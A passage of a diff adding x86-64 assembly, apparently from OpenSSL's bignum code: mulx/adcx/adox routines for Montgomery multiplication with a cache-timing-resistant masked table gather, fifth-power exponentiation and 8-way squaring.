+.Lmulx4xsp_done:	
+	and	\$-64,%rsp		# ensure alignment
+	##############################################################
+	# Stack layout
+	# +0	-num
+	# +8	off-loaded &b[i]
+	# +16	end of b[num]
+	# +24	inner counter
+	# +32	saved n0
+	# +40	saved %rsp
+	# +48
+	# +56	saved rp
+	# +64	tmp[num+1]
+	#
+	mov	$n0, 32(%rsp)		# save *n0
+	mov	%rax,40(%rsp)		# save original %rsp
+.Lmulx4x_body:
+	call	mulx4x_internal
+
+	mov	40(%rsp),%rsi		# restore %rsp
+	mov	\$1,%rax
+___
+$code.=<<___ if ($win64);
+	movaps	-88(%rsi),%xmm6
+	movaps	-72(%rsi),%xmm7
+___
+$code.=<<___;
+	mov	-48(%rsi),%r15
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lmulx4x_epilogue:
+	ret
+.size	bn_mulx4x_mont_gather5,.-bn_mulx4x_mont_gather5
+
+.type	mulx4x_internal,\@abi-omnipotent
+.align	32
+mulx4x_internal:
+	.byte	0x4c,0x89,0x8c,0x24,0x08,0x00,0x00,0x00	# mov	$num,8(%rsp)		# save -$num
+	.byte	0x67
+	neg	$num			# restore $num
+	shl	\$5,$num
+	lea	256($bp,$num),%r13
+	shr	\$5+5,$num
+	mov	`($win64?56:8)`(%rax),%r10d	# load 7th argument
+	sub	\$1,$num
+	mov	%r13,16+8(%rsp)		# end of b[num]
+	mov	$num,24+8(%rsp)		# inner counter
+	mov	$rp, 56+8(%rsp)		# save $rp
+___
+my ($aptr, $bptr, $nptr, $tptr, $mi,  $bi,  $zero, $num)=
+   ("%rsi","%rdi","%rcx","%rbx","%r8","%r9","%rbp","%rax");
+my $rptr=$bptr;
+my $STRIDE=2**5*8;		# 5 is "window size"
+my $N=$STRIDE/4;		# should match cache line size
+$code.=<<___;
+	mov	%r10,%r11
+	shr	\$`log($N/8)/log(2)`,%r10
+	and	\$`$N/8-1`,%r11
+	not	%r10
+	lea	.Lmagic_masks(%rip),%rax
+	and	\$`2**5/($N/8)-1`,%r10	# 5 is "window size"
+	lea	96($bp,%r11,8),$bptr	# pointer within 1st cache line
+	movq	0(%rax,%r10,8),%xmm4	# set of masks denoting which
+	movq	8(%rax,%r10,8),%xmm5	# cache line contains element
+	add	\$7,%r11
+	movq	16(%rax,%r10,8),%xmm6	# denoted by 7th argument
+	movq	24(%rax,%r10,8),%xmm7
+	and	\$7,%r11
+
+	movq	`0*$STRIDE/4-96`($bptr),%xmm0
+	lea	$STRIDE($bptr),$tptr	# borrow $tptr
+	movq	`1*$STRIDE/4-96`($bptr),%xmm1
+	pand	%xmm4,%xmm0
+	movq	`2*$STRIDE/4-96`($bptr),%xmm2
+	pand	%xmm5,%xmm1
+	movq	`3*$STRIDE/4-96`($bptr),%xmm3
+	pand	%xmm6,%xmm2
+	por	%xmm1,%xmm0
+	movq	`0*$STRIDE/4-96`($tptr),%xmm1
+	pand	%xmm7,%xmm3
+	por	%xmm2,%xmm0
+	movq	`1*$STRIDE/4-96`($tptr),%xmm2
+	por	%xmm3,%xmm0
+	.byte	0x67,0x67
+	pand	%xmm4,%xmm1
+	movq	`2*$STRIDE/4-96`($tptr),%xmm3
+
+	movq	%xmm0,%rdx		# bp[0]
+	movq	`3*$STRIDE/4-96`($tptr),%xmm0
+	lea	2*$STRIDE($bptr),$bptr	# next &b[i]
+	pand	%xmm5,%xmm2
+	.byte	0x67,0x67
+	pand	%xmm6,%xmm3
+	##############################################################
+	# $tptr is chosen so that writing to top-most element of the
+	# vector occurs just "above" references to powers table,
+	# "above" modulo cache-line size, which effectively precludes
+	# possibility of memory disambiguation logic failure when
+	# accessing the table.
+	# 
+	lea	64+8*4+8(%rsp,%r11,8),$tptr
+
+	mov	%rdx,$bi
+	mulx	0*8($aptr),$mi,%rax	# a[0]*b[0]
+	mulx	1*8($aptr),%r11,%r12	# a[1]*b[0]
+	add	%rax,%r11
+	mulx	2*8($aptr),%rax,%r13	# ...
+	adc	%rax,%r12
+	adc	\$0,%r13
+	mulx	3*8($aptr),%rax,%r14
+
+	mov	$mi,%r15
+	imulq	32+8(%rsp),$mi		# "t[0]"*n0
+	xor	$zero,$zero		# cf=0, of=0
+	mov	$mi,%rdx
+
+	por	%xmm2,%xmm1
+	pand	%xmm7,%xmm0
+	por	%xmm3,%xmm1
+	mov	$bptr,8+8(%rsp)		# off-load &b[i]
+	por	%xmm1,%xmm0
+
+	.byte	0x48,0x8d,0xb6,0x20,0x00,0x00,0x00	# lea	4*8($aptr),$aptr
+	adcx	%rax,%r13
+	adcx	$zero,%r14		# cf=0
+
+	mulx	0*16($nptr),%rax,%r10
+	adcx	%rax,%r15		# discarded
+	adox	%r11,%r10
+	mulx	1*16($nptr),%rax,%r11
+	adcx	%rax,%r10
+	adox	%r12,%r11
+	mulx	2*16($nptr),%rax,%r12
+	mov	24+8(%rsp),$bptr	# counter value
+	.byte	0x66
+	mov	%r10,-8*4($tptr)
+	adcx	%rax,%r11
+	adox	%r13,%r12
+	mulx	3*16($nptr),%rax,%r15
+	 .byte	0x67,0x67
+	 mov	$bi,%rdx
+	mov	%r11,-8*3($tptr)
+	adcx	%rax,%r12
+	adox	$zero,%r15		# of=0
+	.byte	0x48,0x8d,0x89,0x40,0x00,0x00,0x00	# lea	4*16($nptr),$nptr
+	mov	%r12,-8*2($tptr)
+	#jmp	.Lmulx4x_1st
+
+.align	32
+.Lmulx4x_1st:
+	adcx	$zero,%r15		# cf=0, modulo-scheduled
+	mulx	0*8($aptr),%r10,%rax	# a[4]*b[0]
+	adcx	%r14,%r10
+	mulx	1*8($aptr),%r11,%r14	# a[5]*b[0]
+	adcx	%rax,%r11
+	mulx	2*8($aptr),%r12,%rax	# ...
+	adcx	%r14,%r12
+	mulx	3*8($aptr),%r13,%r14
+	 .byte	0x67,0x67
+	 mov	$mi,%rdx
+	adcx	%rax,%r13
+	adcx	$zero,%r14		# cf=0
+	lea	4*8($aptr),$aptr
+	lea	4*8($tptr),$tptr
+
+	adox	%r15,%r10
+	mulx	0*16($nptr),%rax,%r15
+	adcx	%rax,%r10
+	adox	%r15,%r11
+	mulx	1*16($nptr),%rax,%r15
+	adcx	%rax,%r11
+	adox	%r15,%r12
+	mulx	2*16($nptr),%rax,%r15
+	mov	%r10,-5*8($tptr)
+	adcx	%rax,%r12
+	mov	%r11,-4*8($tptr)
+	adox	%r15,%r13
+	mulx	3*16($nptr),%rax,%r15
+	 mov	$bi,%rdx
+	mov	%r12,-3*8($tptr)
+	adcx	%rax,%r13
+	adox	$zero,%r15
+	lea	4*16($nptr),$nptr
+	mov	%r13,-2*8($tptr)
+
+	dec	$bptr			# of=0, pass cf
+	jnz	.Lmulx4x_1st
+
+	mov	8(%rsp),$num		# load -num
+	movq	%xmm0,%rdx		# bp[1]
+	adc	$zero,%r15		# modulo-scheduled
+	lea	($aptr,$num),$aptr	# rewind $aptr
+	add	%r15,%r14
+	mov	8+8(%rsp),$bptr		# re-load &b[i]
+	adc	$zero,$zero		# top-most carry
+	mov	%r14,-1*8($tptr)
+	jmp	.Lmulx4x_outer
+
+.align	32
+.Lmulx4x_outer:
+	mov	$zero,($tptr)		# save top-most carry
+	lea	4*8($tptr,$num),$tptr	# rewind $tptr
+	mulx	0*8($aptr),$mi,%r11	# a[0]*b[i]
+	xor	$zero,$zero		# cf=0, of=0
+	mov	%rdx,$bi
+	mulx	1*8($aptr),%r14,%r12	# a[1]*b[i]
+	adox	-4*8($tptr),$mi		# +t[0]
+	adcx	%r14,%r11
+	mulx	2*8($aptr),%r15,%r13	# ...
+	adox	-3*8($tptr),%r11
+	adcx	%r15,%r12
+	mulx	3*8($aptr),%rdx,%r14
+	adox	-2*8($tptr),%r12
+	adcx	%rdx,%r13
+	lea	($nptr,$num,2),$nptr	# rewind $nptr
+	lea	4*8($aptr),$aptr
+	adox	-1*8($tptr),%r13
+	adcx	$zero,%r14
+	adox	$zero,%r14
+
+	.byte	0x67
+	mov	$mi,%r15
+	imulq	32+8(%rsp),$mi		# "t[0]"*n0
+
+	movq	`0*$STRIDE/4-96`($bptr),%xmm0
+	.byte	0x67,0x67
+	mov	$mi,%rdx
+	movq	`1*$STRIDE/4-96`($bptr),%xmm1
+	.byte	0x67
+	pand	%xmm4,%xmm0
+	movq	`2*$STRIDE/4-96`($bptr),%xmm2
+	.byte	0x67
+	pand	%xmm5,%xmm1
+	movq	`3*$STRIDE/4-96`($bptr),%xmm3
+	add	\$$STRIDE,$bptr		# next &b[i]
+	.byte	0x67
+	pand	%xmm6,%xmm2
+	por	%xmm1,%xmm0
+	pand	%xmm7,%xmm3
+	xor	$zero,$zero		# cf=0, of=0
+	mov	$bptr,8+8(%rsp)		# off-load &b[i]
+
+	mulx	0*16($nptr),%rax,%r10
+	adcx	%rax,%r15		# discarded
+	adox	%r11,%r10
+	mulx	1*16($nptr),%rax,%r11
+	adcx	%rax,%r10
+	adox	%r12,%r11
+	mulx	2*16($nptr),%rax,%r12
+	adcx	%rax,%r11
+	adox	%r13,%r12
+	mulx	3*16($nptr),%rax,%r15
+	 mov	$bi,%rdx
+	 por	%xmm2,%xmm0
+	mov	24+8(%rsp),$bptr	# counter value
+	mov	%r10,-8*4($tptr)
+	 por	%xmm3,%xmm0
+	adcx	%rax,%r12
+	mov	%r11,-8*3($tptr)
+	adox	$zero,%r15		# of=0
+	mov	%r12,-8*2($tptr)
+	lea	4*16($nptr),$nptr
+	jmp	.Lmulx4x_inner
+
+.align	32
+.Lmulx4x_inner:
+	mulx	0*8($aptr),%r10,%rax	# a[4]*b[i]
+	adcx	$zero,%r15		# cf=0, modulo-scheduled
+	adox	%r14,%r10
+	mulx	1*8($aptr),%r11,%r14	# a[5]*b[i]
+	adcx	0*8($tptr),%r10
+	adox	%rax,%r11
+	mulx	2*8($aptr),%r12,%rax	# ...
+	adcx	1*8($tptr),%r11
+	adox	%r14,%r12
+	mulx	3*8($aptr),%r13,%r14
+	 mov	$mi,%rdx
+	adcx	2*8($tptr),%r12
+	adox	%rax,%r13
+	adcx	3*8($tptr),%r13
+	adox	$zero,%r14		# of=0
+	lea	4*8($aptr),$aptr
+	lea	4*8($tptr),$tptr
+	adcx	$zero,%r14		# cf=0
+
+	adox	%r15,%r10
+	mulx	0*16($nptr),%rax,%r15
+	adcx	%rax,%r10
+	adox	%r15,%r11
+	mulx	1*16($nptr),%rax,%r15
+	adcx	%rax,%r11
+	adox	%r15,%r12
+	mulx	2*16($nptr),%rax,%r15
+	mov	%r10,-5*8($tptr)
+	adcx	%rax,%r12
+	adox	%r15,%r13
+	mov	%r11,-4*8($tptr)
+	mulx	3*16($nptr),%rax,%r15
+	 mov	$bi,%rdx
+	lea	4*16($nptr),$nptr
+	mov	%r12,-3*8($tptr)
+	adcx	%rax,%r13
+	adox	$zero,%r15
+	mov	%r13,-2*8($tptr)
+
+	dec	$bptr			# of=0, pass cf
+	jnz	.Lmulx4x_inner
+
+	mov	0+8(%rsp),$num		# load -num
+	movq	%xmm0,%rdx		# bp[i+1]
+	adc	$zero,%r15		# modulo-scheduled
+	sub	0*8($tptr),$bptr	# pull top-most carry to %cf
+	mov	8+8(%rsp),$bptr		# re-load &b[i]
+	mov	16+8(%rsp),%r10
+	adc	%r15,%r14
+	lea	($aptr,$num),$aptr	# rewind $aptr
+	adc	$zero,$zero		# top-most carry
+	mov	%r14,-1*8($tptr)
+
+	cmp	%r10,$bptr
+	jb	.Lmulx4x_outer
+
+	mov	-16($nptr),%r10
+	xor	%r15,%r15
+	sub	%r14,%r10		# compare top-most words
+	adc	%r15,%r15
+	or	%r15,$zero
+	xor	\$1,$zero
+	lea	($tptr,$num),%rdi	# rewind $tptr
+	lea	($nptr,$num,2),$nptr	# rewind $nptr
+	.byte	0x67,0x67
+	sar	\$3+2,$num		# cf=0
+	lea	($nptr,$zero,8),%rbp
+	mov	56+8(%rsp),%rdx		# restore rp
+	mov	$num,%rcx
+	jmp	.Lsqrx4x_sub		# common post-condition
+.size	mulx4x_internal,.-mulx4x_internal
+___
+}{
+######################################################################
+# void bn_power5(
+my $rptr="%rdi";	# BN_ULONG *rptr,
+my $aptr="%rsi";	# const BN_ULONG *aptr,
+my $bptr="%rdx";	# const void *table,
+my $nptr="%rcx";	# const BN_ULONG *nptr,
+my $n0  ="%r8";		# const BN_ULONG *n0);
+my $num ="%r9";		# int num, has to be divisible by 8
+			# int pwr);
+
+my ($i,$j,$tptr)=("%rbp","%rcx",$rptr);
+my @A0=("%r10","%r11");
+my @A1=("%r12","%r13");
+my ($a0,$a1,$ai)=("%r14","%r15","%rbx");
+
+$code.=<<___;
+.type	bn_powerx5,\@function,6
+.align	32
+bn_powerx5:
+.Lpowerx5_enter:
+	.byte	0x67
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0x28(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+___
+$code.=<<___;
+	.byte	0x67
+	mov	${num}d,%r10d
+	shl	\$3,${num}d		# convert $num to bytes
+	shl	\$3+2,%r10d		# 4*$num
+	neg	$num
+	mov	($n0),$n0		# *n0
+
+	##############################################################
+	# ensure that stack frame doesn't alias with $aptr+4*$num
+	# modulo 4096, which covers ret[num], am[num] and n[2*num]
+	# (see bn_exp.c). this is done to allow memory disambiguation
+	# logic do its magic.
+	#
+	lea	-64(%rsp,$num,2),%r11
+	sub	$aptr,%r11
+	and	\$4095,%r11
+	cmp	%r11,%r10
+	jb	.Lpwrx_sp_alt
+	sub	%r11,%rsp		# align with $aptr
+	lea	-64(%rsp,$num,2),%rsp	# alloca(frame+2*$num)
+	jmp	.Lpwrx_sp_done
+
+.align	32
+.Lpwrx_sp_alt:
+	lea	4096-64(,$num,2),%r10	# 4096-frame-2*$num
+	lea	-64(%rsp,$num,2),%rsp	# alloca(frame+2*$num)
+	sub	%r10,%r11
+	mov	\$0,%r10
+	cmovc	%r10,%r11
+	sub	%r11,%rsp
+.Lpwrx_sp_done:
+	and	\$-64,%rsp
+	mov	$num,%r10	
+	neg	$num
+
+	##############################################################
+	# Stack layout
+	#
+	# +0	saved $num, used in reduction section
+	# +8	&t[2*$num], used in reduction section
+	# +16	intermediate carry bit
+	# +24	top-most carry bit, used in reduction section
+	# +32	saved *n0
+	# +40	saved %rsp
+	# +48	t[2*$num]
+	#
+	pxor	%xmm0,%xmm0
+	movq	$rptr,%xmm1		# save $rptr
+	movq	$nptr,%xmm2		# save $nptr
+	movq	%r10, %xmm3		# -$num
+	movq	$bptr,%xmm4
+	mov	$n0,  32(%rsp)
+	mov	%rax, 40(%rsp)		# save original %rsp
+.Lpowerx5_body:
+
+	call	__bn_sqrx8x_internal
+	call	__bn_sqrx8x_internal
+	call	__bn_sqrx8x_internal
+	call	__bn_sqrx8x_internal
+	call	__bn_sqrx8x_internal
+
+	mov	%r10,$num		# -num
+	mov	$aptr,$rptr
+	movq	%xmm2,$nptr
+	movq	%xmm4,$bptr
+	mov	40(%rsp),%rax
+
+	call	mulx4x_internal
+
+	mov	40(%rsp),%rsi		# restore %rsp
+	mov	\$1,%rax
+___
+$code.=<<___ if ($win64);
+	movaps	-88(%rsi),%xmm6
+	movaps	-72(%rsi),%xmm7
+___
+$code.=<<___;
+	mov	-48(%rsi),%r15
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lpowerx5_epilogue:
+	ret
+.size	bn_powerx5,.-bn_powerx5
+
+.globl	bn_sqrx8x_internal
+.hidden	bn_sqrx8x_internal
+.type	bn_sqrx8x_internal,\@abi-omnipotent
+.align	32
+bn_sqrx8x_internal:
+__bn_sqrx8x_internal:
+	##################################################################
+	# Squaring part:
+	#
+	# a) multiply-n-add everything but a[i]*a[i];
+	# b) shift result of a) by 1 to the left and accumulate
+	#    a[i]*a[i] products;
+	#
+	##################################################################
+	# a[7]a[7]a[6]a[6]a[5]a[5]a[4]a[4]a[3]a[3]a[2]a[2]a[1]a[1]a[0]a[0]
+	#                                                     a[1]a[0]
+	#                                                 a[2]a[0]
+	#                                             a[3]a[0]
+	#                                             a[2]a[1]
+	#                                         a[3]a[1]
+	#                                     a[3]a[2]
+	#
+	#                                         a[4]a[0]
+	#                                     a[5]a[0]
+	#                                 a[6]a[0]
+	#                             a[7]a[0]
+	#                                     a[4]a[1]
+	#                                 a[5]a[1]
+	#                             a[6]a[1]
+	#                         a[7]a[1]
+	#                                 a[4]a[2]
+	#                             a[5]a[2]
+	#                         a[6]a[2]
+	#                     a[7]a[2]
+	#                             a[4]a[3]
+	#                         a[5]a[3]
+	#                     a[6]a[3]
+	#                 a[7]a[3]
+	#
+	#                     a[5]a[4]
+	#                 a[6]a[4]
+	#             a[7]a[4]
+	#             a[6]a[5]
+	#         a[7]a[5]
+	#     a[7]a[6]
+	# a[7]a[7]a[6]a[6]a[5]a[5]a[4]a[4]a[3]a[3]a[2]a[2]a[1]a[1]a[0]a[0]
+___
+{
+my ($zero,$carry)=("%rbp","%rcx");
+my $aaptr=$zero;
+$code.=<<___;
+	lea	48+8(%rsp),$tptr
+	lea	($aptr,$num),$aaptr
+	mov	$num,0+8(%rsp)			# save $num
+	mov	$aaptr,8+8(%rsp)		# save end of $aptr
+	jmp	.Lsqr8x_zero_start
+
+.align	32
+.byte	0x66,0x66,0x66,0x2e,0x0f,0x1f,0x84,0x00,0x00,0x00,0x00,0x00
+.Lsqrx8x_zero:
+	.byte	0x3e
+	movdqa	%xmm0,0*8($tptr)
+	movdqa	%xmm0,2*8($tptr)
+	movdqa	%xmm0,4*8($tptr)
+	movdqa	%xmm0,6*8($tptr)
+.Lsqr8x_zero_start:			# aligned at 32
+	movdqa	%xmm0,8*8($tptr)
+	movdqa	%xmm0,10*8($tptr)
+	movdqa	%xmm0,12*8($tptr)
+	movdqa	%xmm0,14*8($tptr)
+	lea	16*8($tptr),$tptr
+	sub	\$64,$num
+	jnz	.Lsqrx8x_zero
+
+	mov	0*8($aptr),%rdx		# a[0], modulo-scheduled
+	#xor	%r9,%r9			# t[1], ex-$num, zero already
+	xor	%r10,%r10
+	xor	%r11,%r11
+	xor	%r12,%r12
+	xor	%r13,%r13
+	xor	%r14,%r14
+	xor	%r15,%r15
+	lea	48+8(%rsp),$tptr
+	xor	$zero,$zero		# cf=0, cf=0
+	jmp	.Lsqrx8x_outer_loop
+
+.align	32
+.Lsqrx8x_outer_loop:
+	mulx	1*8($aptr),%r8,%rax	# a[1]*a[0]
+	adcx	%r9,%r8			# a[1]*a[0]+=t[1]
+	adox	%rax,%r10
+	mulx	2*8($aptr),%r9,%rax	# a[2]*a[0]
+	adcx	%r10,%r9
+	adox	%rax,%r11
+	.byte	0xc4,0xe2,0xab,0xf6,0x86,0x18,0x00,0x00,0x00	# mulx	3*8($aptr),%r10,%rax	# ...
+	adcx	%r11,%r10
+	adox	%rax,%r12
+	.byte	0xc4,0xe2,0xa3,0xf6,0x86,0x20,0x00,0x00,0x00	# mulx	4*8($aptr),%r11,%rax
+	adcx	%r12,%r11
+	adox	%rax,%r13
+	mulx	5*8($aptr),%r12,%rax
+	adcx	%r13,%r12
+	adox	%rax,%r14
+	mulx	6*8($aptr),%r13,%rax
+	adcx	%r14,%r13
+	adox	%r15,%rax
+	mulx	7*8($aptr),%r14,%r15
+	 mov	1*8($aptr),%rdx		# a[1]
+	adcx	%rax,%r14
+	adox	$zero,%r15
+	adc	8*8($tptr),%r15
+	mov	%r8,1*8($tptr)		# t[1]
+	mov	%r9,2*8($tptr)		# t[2]
+	sbb	$carry,$carry		# mov %cf,$carry
+	xor	$zero,$zero		# cf=0, of=0
+
+
+	mulx	2*8($aptr),%r8,%rbx	# a[2]*a[1]
+	mulx	3*8($aptr),%r9,%rax	# a[3]*a[1]
+	adcx	%r10,%r8
+	adox	%rbx,%r9
+	mulx	4*8($aptr),%r10,%rbx	# ...
+	adcx	%r11,%r9
+	adox	%rax,%r10
+	.byte	0xc4,0xe2,0xa3,0xf6,0x86,0x28,0x00,0x00,0x00	# mulx	5*8($aptr),%r11,%rax
+	adcx	%r12,%r10
+	adox	%rbx,%r11
+	.byte	0xc4,0xe2,0x9b,0xf6,0x9e,0x30,0x00,0x00,0x00	# mulx	6*8($aptr),%r12,%rbx
+	adcx	%r13,%r11
+	adox	%r14,%r12
+	.byte	0xc4,0x62,0x93,0xf6,0xb6,0x38,0x00,0x00,0x00	# mulx	7*8($aptr),%r13,%r14
+	 mov	2*8($aptr),%rdx		# a[2]
+	adcx	%rax,%r12
+	adox	%rbx,%r13
+	adcx	%r15,%r13
+	adox	$zero,%r14		# of=0
+	adcx	$zero,%r14		# cf=0
+
+	mov	%r8,3*8($tptr)		# t[3]
+	mov	%r9,4*8($tptr)		# t[4]
+
+	mulx	3*8($aptr),%r8,%rbx	# a[3]*a[2]
+	mulx	4*8($aptr),%r9,%rax	# a[4]*a[2]
+	adcx	%r10,%r8
+	adox	%rbx,%r9
+	mulx	5*8($aptr),%r10,%rbx	# ...
+	adcx	%r11,%r9
+	adox	%rax,%r10
+	.byte	0xc4,0xe2,0xa3,0xf6,0x86,0x30,0x00,0x00,0x00	# mulx	6*8($aptr),%r11,%rax
+	adcx	%r12,%r10
+	adox	%r13,%r11
+	.byte	0xc4,0x62,0x9b,0xf6,0xae,0x38,0x00,0x00,0x00	# mulx	7*8($aptr),%r12,%r13
+	.byte	0x3e
+	 mov	3*8($aptr),%rdx		# a[3]
+	adcx	%rbx,%r11
+	adox	%rax,%r12
+	adcx	%r14,%r12
+	mov	%r8,5*8($tptr)		# t[5]
+	mov	%r9,6*8($tptr)		# t[6]
+	 mulx	4*8($aptr),%r8,%rax	# a[4]*a[3]
+	adox	$zero,%r13		# of=0
+	adcx	$zero,%r13		# cf=0
+
+	mulx	5*8($aptr),%r9,%rbx	# a[5]*a[3]
+	adcx	%r10,%r8
+	adox	%rax,%r9
+	mulx	6*8($aptr),%r10,%rax	# ...
+	adcx	%r11,%r9
+	adox	%r12,%r10
+	mulx	7*8($aptr),%r11,%r12
+	 mov	4*8($aptr),%rdx		# a[4]
+	 mov	5*8($aptr),%r14		# a[5]
+	adcx	%rbx,%r10
+	adox	%rax,%r11
+	 mov	6*8($aptr),%r15		# a[6]
+	adcx	%r13,%r11
+	adox	$zero,%r12		# of=0
+	adcx	$zero,%r12		# cf=0
+
+	mov	%r8,7*8($tptr)		# t[7]
+	mov	%r9,8*8($tptr)		# t[8]
+
+	mulx	%r14,%r9,%rax		# a[5]*a[4]
+	 mov	7*8($aptr),%r8		# a[7]
+	adcx	%r10,%r9
+	mulx	%r15,%r10,%rbx		# a[6]*a[4]
+	adox	%rax,%r10
+	adcx	%r11,%r10
+	mulx	%r8,%r11,%rax		# a[7]*a[4]
+	 mov	%r14,%rdx		# a[5]
+	adox	%rbx,%r11
+	adcx	%r12,%r11
+	#adox	$zero,%rax		# of=0
+	adcx	$zero,%rax		# cf=0
+
+	mulx	%r15,%r14,%rbx		# a[6]*a[5]
+	mulx	%r8,%r12,%r13		# a[7]*a[5]
+	 mov	%r15,%rdx		# a[6]
+	 lea	8*8($aptr),$aptr
+	adcx	%r14,%r11
+	adox	%rbx,%r12
+	adcx	%rax,%r12
+	adox	$zero,%r13
+
+	.byte	0x67,0x67
+	mulx	%r8,%r8,%r14		# a[7]*a[6]
+	adcx	%r8,%r13
+	adcx	$zero,%r14
+
+	cmp	8+8(%rsp),$aptr
+	je	.Lsqrx8x_outer_break
+
+	neg	$carry			# mov $carry,%cf
+	mov	\$-8,%rcx
+	mov	$zero,%r15
+	mov	8*8($tptr),%r8
+	adcx	9*8($tptr),%r9		# +=t[9]
+	adcx	10*8($tptr),%r10	# ...
+	adcx	11*8($tptr),%r11
+	adc	12*8($tptr),%r12
+	adc	13*8($tptr),%r13
+	adc	14*8($tptr),%r14
+	adc	15*8($tptr),%r15
+	lea	($aptr),$aaptr
+	lea	2*64($tptr),$tptr
+	sbb	%rax,%rax		# mov %cf,$carry
+
+	mov	-64($aptr),%rdx		# a[0]
+	mov	%rax,16+8(%rsp)		# offload $carry
+	mov	$tptr,24+8(%rsp)
+
+	#lea	8*8($tptr),$tptr	# see 2*8*8($tptr) above
+	xor	%eax,%eax		# cf=0, of=0
+	jmp	.Lsqrx8x_loop
+
+.align	32
+.Lsqrx8x_loop:
+	mov	%r8,%rbx
+	mulx	0*8($aaptr),%rax,%r8	# a[8]*a[i]
+	adcx	%rax,%rbx		# +=t[8]
+	adox	%r9,%r8
+
+	mulx	1*8($aaptr),%rax,%r9	# ...
+	adcx	%rax,%r8
+	adox	%r10,%r9
+
+	mulx	2*8($aaptr),%rax,%r10
+	adcx	%rax,%r9
+	adox	%r11,%r10
+
+	mulx	3*8($aaptr),%rax,%r11
+	adcx	%rax,%r10
+	adox	%r12,%r11
+
+	.byte	0xc4,0x62,0xfb,0xf6,0xa5,0x20,0x00,0x00,0x00	# mulx	4*8($aaptr),%rax,%r12
+	adcx	%rax,%r11
+	adox	%r13,%r12
+
+	mulx	5*8($aaptr),%rax,%r13
+	adcx	%rax,%r12
+	adox	%r14,%r13
+
+	mulx	6*8($aaptr),%rax,%r14
+	 mov	%rbx,($tptr,%rcx,8)	# store t[8+i]
+	 mov	\$0,%ebx
+	adcx	%rax,%r13
+	adox	%r15,%r14
+
+	.byte	0xc4,0x62,0xfb,0xf6,0xbd,0x38,0x00,0x00,0x00	# mulx	7*8($aaptr),%rax,%r15
+	 mov	8($aptr,%rcx,8),%rdx	# a[i]
+	adcx	%rax,%r14
+	adox	%rbx,%r15		# %rbx is 0, of=0
+	adcx	%rbx,%r15		# cf=0
+
+	.byte	0x67
+	inc	%rcx			# of=0
+	jnz	.Lsqrx8x_loop
+
+	lea	8*8($aaptr),$aaptr
+	mov	\$-8,%rcx
+	cmp	8+8(%rsp),$aaptr	# done?
+	je	.Lsqrx8x_break
+
+	sub	16+8(%rsp),%rbx		# mov 16(%rsp),%cf
+	.byte	0x66
+	mov	-64($aptr),%rdx
+	adcx	0*8($tptr),%r8
+	adcx	1*8($tptr),%r9
+	adc	2*8($tptr),%r10
+	adc	3*8($tptr),%r11
+	adc	4*8($tptr),%r12
+	adc	5*8($tptr),%r13
+	adc	6*8($tptr),%r14
+	adc	7*8($tptr),%r15
+	lea	8*8($tptr),$tptr
+	.byte	0x67
+	sbb	%rax,%rax		# mov %cf,%rax
+	xor	%ebx,%ebx		# cf=0, of=0
+	mov	%rax,16+8(%rsp)		# offload carry
+	jmp	.Lsqrx8x_loop
+
+.align	32
+.Lsqrx8x_break:
+	sub	16+8(%rsp),%r8		# consume last carry
+	mov	24+8(%rsp),$carry	# initial $tptr, borrow $carry
+	mov	0*8($aptr),%rdx		# a[8], modulo-scheduled
+	xor	%ebp,%ebp		# xor	$zero,$zero
+	mov	%r8,0*8($tptr)
+	cmp	$carry,$tptr		# cf=0, of=0
+	je	.Lsqrx8x_outer_loop
+
+	mov	%r9,1*8($tptr)
+	 mov	1*8($carry),%r9
+	mov	%r10,2*8($tptr)
+	 mov	2*8($carry),%r10
+	mov	%r11,3*8($tptr)
+	 mov	3*8($carry),%r11
+	mov	%r12,4*8($tptr)
+	 mov	4*8($carry),%r12
+	mov	%r13,5*8($tptr)
+	 mov	5*8($carry),%r13
+	mov	%r14,6*8($tptr)
+	 mov	6*8($carry),%r14
+	mov	%r15,7*8($tptr)
+	 mov	7*8($carry),%r15
+	mov	$carry,$tptr
+	jmp	.Lsqrx8x_outer_loop
+
+.align	32
+.Lsqrx8x_outer_break:
+	mov	%r9,9*8($tptr)		# t[9]
+	 movq	%xmm3,%rcx		# -$num
+	mov	%r10,10*8($tptr)	# ...
+	mov	%r11,11*8($tptr)
+	mov	%r12,12*8($tptr)
+	mov	%r13,13*8($tptr)
+	mov	%r14,14*8($tptr)
+___
+}{
+my $i="%rcx";
+$code.=<<___;
+	lea	48+8(%rsp),$tptr
+	mov	($aptr,$i),%rdx		# a[0]
+
+	mov	8($tptr),$A0[1]		# t[1]
+	xor	$A0[0],$A0[0]		# t[0], of=0, cf=0
+	mov	0+8(%rsp),$num		# restore $num
+	adox	$A0[1],$A0[1]
+	 mov	16($tptr),$A1[0]	# t[2]	# prefetch
+	 mov	24($tptr),$A1[1]	# t[3]	# prefetch
+	#jmp	.Lsqrx4x_shift_n_add	# happens to be aligned
+
+.align	32
+.Lsqrx4x_shift_n_add:
+	mulx	%rdx,%rax,%rbx
+	 adox	$A1[0],$A1[0]
+	adcx	$A0[0],%rax
+	 .byte	0x48,0x8b,0x94,0x0e,0x08,0x00,0x00,0x00	# mov	8($aptr,$i),%rdx	# a[i+1]	# prefetch
+	 .byte	0x4c,0x8b,0x97,0x20,0x00,0x00,0x00	# mov	32($tptr),$A0[0]	# t[2*i+4]	# prefetch
+	 adox	$A1[1],$A1[1]
+	adcx	$A0[1],%rbx
+	 mov	40($tptr),$A0[1]		# t[2*i+4+1]	# prefetch
+	mov	%rax,0($tptr)
+	mov	%rbx,8($tptr)
+
+	mulx	%rdx,%rax,%rbx
+	 adox	$A0[0],$A0[0]
+	adcx	$A1[0],%rax
+	 mov	16($aptr,$i),%rdx	# a[i+2]	# prefetch
+	 mov	48($tptr),$A1[0]	# t[2*i+6]	# prefetch
+	 adox	$A0[1],$A0[1]
+	adcx	$A1[1],%rbx
+	 mov	56($tptr),$A1[1]	# t[2*i+6+1]	# prefetch
+	mov	%rax,16($tptr)
